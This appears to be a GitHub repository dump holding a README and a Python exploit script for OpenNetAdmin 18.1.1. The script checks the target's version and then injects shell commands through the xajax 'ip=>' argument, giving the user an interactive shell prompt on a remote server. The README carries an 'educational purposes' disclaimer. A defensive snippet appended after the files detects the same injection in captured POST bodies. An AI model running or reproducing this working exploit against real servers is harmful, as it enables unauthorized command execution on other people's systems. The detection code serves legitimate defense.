├── README.md
├── ona-proof.png
└── ona-rce.py


/README.md:
--------------------------------------------------------------------------------
OpenNetAdmin 18.1.1 - Remote Code Execution
====

OpenNetAdmin 18.1.1 - Remote Code Execution

https://amriunix.com/

## Usage:
```shell
$ python3 ona-rce.py [check | exploit] <URL>
```
* `check` -- Verify if the target is vulnerable
* `exploit` -- Exploiting the target
* `URL` -- The remote target

## Installation

    pip3 install --user requests
    git clone https://github.com/amriunix/ona-rce.git

## PoC

![Proof Of Concept for the OpenNetAdmin 18.1.1 - Remote Code Execution](ona-proof.png)

### Disclaimer:

All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

--------------------------------------------------------------------------------
/ona-proof.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/amriunix/ona-rce/c4c809e8c757f27aad97f3b045c4fbc0f0efdbf8/ona-proof.png

--------------------------------------------------------------------------------
/ona-rce.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

'''
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2020-01-18
# Exploit Author: @amriunix (https://amriunix.com)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
'''

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


def helper(filename):
    print("\n[-] Usage: python3 " + filename + " [check | exploit] ")
    print("\n[*] Options:")
    print("\t[+] check    : Verify if the target is vulnerable")
    print("\t[+] exploit  : Exploiting the target\n")
    exit(1)


def check(target):
    # Version check only: looks for the 'v18.1.1' string in the returned page.
    try:
        req = requests.get(url = target, verify = False)
    except requests.RequestException:
        print("[-] Warning: Error while connecting to the remote target")
        exit(1)
    return('v18.1.1' in req.text)


def exploit(target, cmd):
    # The command is wrapped in BEGIN/END markers so its output can be cut
    # out of the response body below.
    payload = {
        'xajax':'window_submit',
        'xajaxr':'1574117726710',
        'xajaxargs[]':['tooltips','ip=>;echo \"BEGIN\";{} 2>&1;echo \"END\"'.format(cmd),'ping']
    }
    try:
        req = requests.post(url = target, data = payload, verify = False)
    except requests.RequestException:
        print("[-] Warning: Error while connecting to the remote target")
        exit(1)
    data = req.text
    result = data[data.find('BEGIN')+6:data.find('END')-1]
    return(result)


if __name__ == '__main__':
    print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution')
    filename = sys.argv[0]
    if len(sys.argv) != 3:
        helper(filename)
    else:
        print("[+] Connecting !")
        opt = sys.argv[1].lower()
        target = sys.argv[2] + '/'
        if opt == 'check':
            if (check(target)):
                print("[+] The remote host is vulnerable!")
            else:
                print("[-] The remote host is NOT vulnerable!")
        elif opt == 'exploit':
            if (check(target)):
                print("[+] Connected Successfully!")
            else:
                print("[-] Warning: Error while connecting to the remote target")
            cmd = ''
            while(True):
                cmd = input('sh$ ').lower()
                if (cmd == 'exit'):
                    exit(0)
                print(exploit(target, cmd))
        else:
            print("[-] Warning: Command not found !")

--------------------------------------------------------------------------------
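
For defenders, the request shape this PoC sends can be looked for in captured POST bodies (WAF or reverse-proxy audit logs). The following is an added example, not part of the amriunix/ona-rce repository; the `name=>value` argument shape, the metacharacter set and both sample bodies are assumptions constructed from the payload in ona-rce.py.

```python
import re
from urllib.parse import parse_qs, urlencode

# Characters a shell treats specially; none belong in an address value.
SHELL_META = re.compile(r"""[;|&`$<>"'\\\n]""")
# Assumed argument shape "name=>value", taken from the PoC's 'ip=>...' string.
ARG_PREFIX = re.compile(r"^\w+=>")


def inspect_body(body):
    """Return (arg index, metacharacters) findings for one form-encoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    if "window_submit" not in fields.get("xajax", []):
        return []  # not the xajax call the PoC uses
    findings = []
    for index, arg in enumerate(fields.get("xajaxargs[]", [])):
        # Drop the "name=>" prefix so its own '>' is not counted as a hit.
        value = ARG_PREFIX.sub("", arg, count=1)
        hits = sorted(set(SHELL_META.findall(value)))
        if hits:
            findings.append((index, "".join(hits)))
    return findings


def build_body(ip_value):
    """Encode a constructed sample body the way a form post would be encoded."""
    fields = {
        "xajax": "window_submit",
        "xajaxargs[]": ["tooltips", "ip=>" + ip_value, "ping"],
    }
    return urlencode(fields, doseq=True)


# Constructed samples: a plain address, and the argument string from
# ona-rce.py with `id` standing in for the command.
BENIGN = build_body("192.0.2.10")
POC = build_body(';echo "BEGIN";id 2>&1;echo "END"')

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("poc", POC)):
        print(name, inspect_body(body))
```

A finding identifies which `xajaxargs[]` entry carried shell metacharacters, which is enough to alert on or block the request before it reaches the application.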